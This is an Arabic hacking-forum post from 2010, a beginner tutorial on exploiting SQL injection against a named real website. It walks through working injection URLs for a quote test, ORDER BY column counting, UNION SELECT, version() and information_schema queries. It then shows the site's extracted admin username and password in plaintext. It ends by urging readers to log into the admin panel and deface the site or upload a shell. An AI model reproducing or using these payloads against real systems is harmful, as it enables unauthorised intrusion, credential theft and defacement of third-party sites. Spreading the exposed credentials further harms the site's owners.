شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك 202011_md_12982104031

انضم إلى المنتدى ، فالأمر سريع وسهل

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك 202011_md_12982104031
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

  • الرئيسية
  • البوابة
  • أحدث الصور
  • التسجيل
  • دخول

شبكة ارض الابداع


Hit Counters
شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك Pageviews=1 Bookmark and Share

ضع بريدك ليصلك جديد شبكة اراض الابداع





شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك

 :: 

 :: منتدى الهكرز و الاختراق

اذهب الى الأسفل

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك Empty شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك

مُساهمة من طرف المدير السبت أغسطس 07, 2010 11:46 am


كيفكم شباب امان العرب الكرام بقالي كتير ما نزلت شروحات قلت ابدأ انزل شوي شورحات افيد الناس

درسي اليوم هوه عن حقن موقع ثغره SQL للمبتدئين وانشاء الله نشوفكم كلكم حقنين شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك Shiny01

بسم الله نبدأ

معنا موقع مصاب بـSQL
 كود PHP:
http://www.cssanyu.org/news/showevent.php?id=2





نقوم بوضع علامه ' ليظهر لنا خطـا الـشكل مثال

ويصبح الاستغلال كدا
 كود PHP:
http://www.cssanyu.org/news/showevent.php?id=2'


شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك AVi93031
حلو جدا الحين انا عاوز اعرف عدد الجداول الموجوده وش اسوي

راح نستخدم امر

order+by

وراح يكون كدا الاستغلال

كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+order+by+6--


كدا حلو ما ظهر لنا خطأ

يبقي عدد 6 في الجداول موجود

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك UQ193279

طيب الحين نزود عدد 6 الى 7 و 8 لحد ما يظهر لنا الخطأ

طيب الحين نزود عدد ليصبح عدد الجداول 7

كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+order+by+7--


ظهر لنا الخطأ

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك BMZ93363

وكدا نعلم ان عدد الجداول المصابه في الموقع هم 6 لان الموقع اشتغل عند هذا العدد

الحين نستخدم امر union+select لكي نظهر الجداول المصابه بالموقع

ونضع عدد الجداول الى هم + وراح يصبح الاستغلال كدا

كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6--


يجب ان

لا ننس ان نضع علامه - قبل الرقم المتغير الى هوه رقم 2

صوره توضيحيه
شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك X3593609

حلو الحين عندنا الجدول رقم 3 ورقم 4 مصابين كما بالصوره

الحين نشوف اصدار القاعده

نضع امر version() في العمود المصاب

هذا استغلال بسيط

كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,version(),5,6--


حلو

الحين جدا ظهر لنا الاصدار الخامس كما بالصوره

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك BoC93795

احسن شيئ في الاصدار الخامس ممكن تطلع اسماء الجداول من غير ما تخمن وهذي الميزه حلوه جدا

حلو الحين راح نستخدم امر الاستعلام هذا

كود PHP:
+from+information_schema.columns+WHERE+column_nam e+LIKE+


امسح المسافات من كلمه نيم
بعد كلمه Like راح نضيف تشفير الى بدينا نبحث عنه داخل قواعد البينات

وراح ارفق لكم بعض التشفيرات

وراح نضع في العمود المصاب

هذا الاستعلام

concat(table_nam e,0x3e,column_nam e,0x3e,table_schema)

امسح المسافات من كلمه نيم

الحين بيصبح الاستغلال

كدا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,concat(table_nam
e,0x3e,column_nam
e,0x3e,table_schema),5,6+from+information_schema.columns+WHERE+column_nam
e+LIKE+char(37, 112, 97, 115, 115, 37)--


امسح المسافات من كلمه نيم
طبعا التشفير الموجود بعد كلمه Like هوه لكلمه %pass%

وهذي العلامه % تعني ان ممكن يكون اسمه قبل pass او بعده

والتشفير

كود PHP:
char(37, 112, 97, 115, 115, 37)


هوه الى راح نغيرو للبحث بأسماء

اخري مثل %user% و %login% و %admin% تم وضع مرفقات مع الدرس

وهكذا بعد ما كتبنا الاستغلال نشوف وش النتيجه

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك I6T93985

حلو تم استخراج البينات المطلوبه

admin>password>nyucssamember

admin : اسم الجدول

Password : ام العمود

الحين نروح نستخدم البينات الى احنا طلعناها علشان نجيب اسم اليوزر حقت الادمن والباسورد

رجع لاظهاء الجداول المصابه مره اخري

كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6--


الحين نستخدم امر

+from+اسم الجدول --

وفي العمود المصاب نضع password الى استخرجناها

والجدول طبعأ بيكون admin

يعني يصبح كدا

كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,password,4,5,6+From+admin--


حلو

جدا الان الاتغلال ظهر لنا الباسورد الى احنا طلبناه حق الادمن

شوف الصوره
شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك ZZ694526

والباسورد هوه spc1234

طيب الحين نجرب نفس الاستغلال ونبدأ password بـ usernam eعلشان نطلع يوزر

الادمن
شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك QSl94781
اليوزر هوه spc

طيب الحين كل شيئ تمام الان نروح للوحه الموقع وانت الى عليك تخمنها

احيانا بتكون

admin.php

login.php

control.php

ومسار اللوحه

كود PHP:
http://www.cssanyu.org/news/login.php?


الحين معنا اليوزر والباس ندخلهم كما بالصوره

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك 91V94827

ونضغط login

طيب حلو اكيد كل موقع واللوحه حقو تختلف عن الاخري

الان نروح للاخبار = news

ونضغط Edit

وقم بوضع الاندكس حقق علي الموقع عن طريق التعديل

او ممكن ترفع شيل او الى تيبيه الموقع متاح وانت جرب

شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك 9vz95065
وهذي هيه الصوره بعد الحفظ
شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك Zu495185


الحين كل شيئ تمام واتمنى يكون الدرس واضح ومفهوم وما فيه اي تعقيد

والى ما فهم ما راح انساه كمان

شرحت لكم فديو كمان علشان ما في احد يطلع مو فاهم من الموضوع شرح الاختراق بأستخدام ثغره sql بالصور والفديو واتحدي موقع يعدي من اديك F_031

تحميل التشفيرات من المرفقات

التحميل من هـــنـــا
المدير
المدير
المدير العام

المدير العام

عدد المساهمات : 470
تاريخ التسجيل : 10/07/2010

https://ardeebdaa.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 :: 

 :: منتدى الهكرز و الاختراق

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى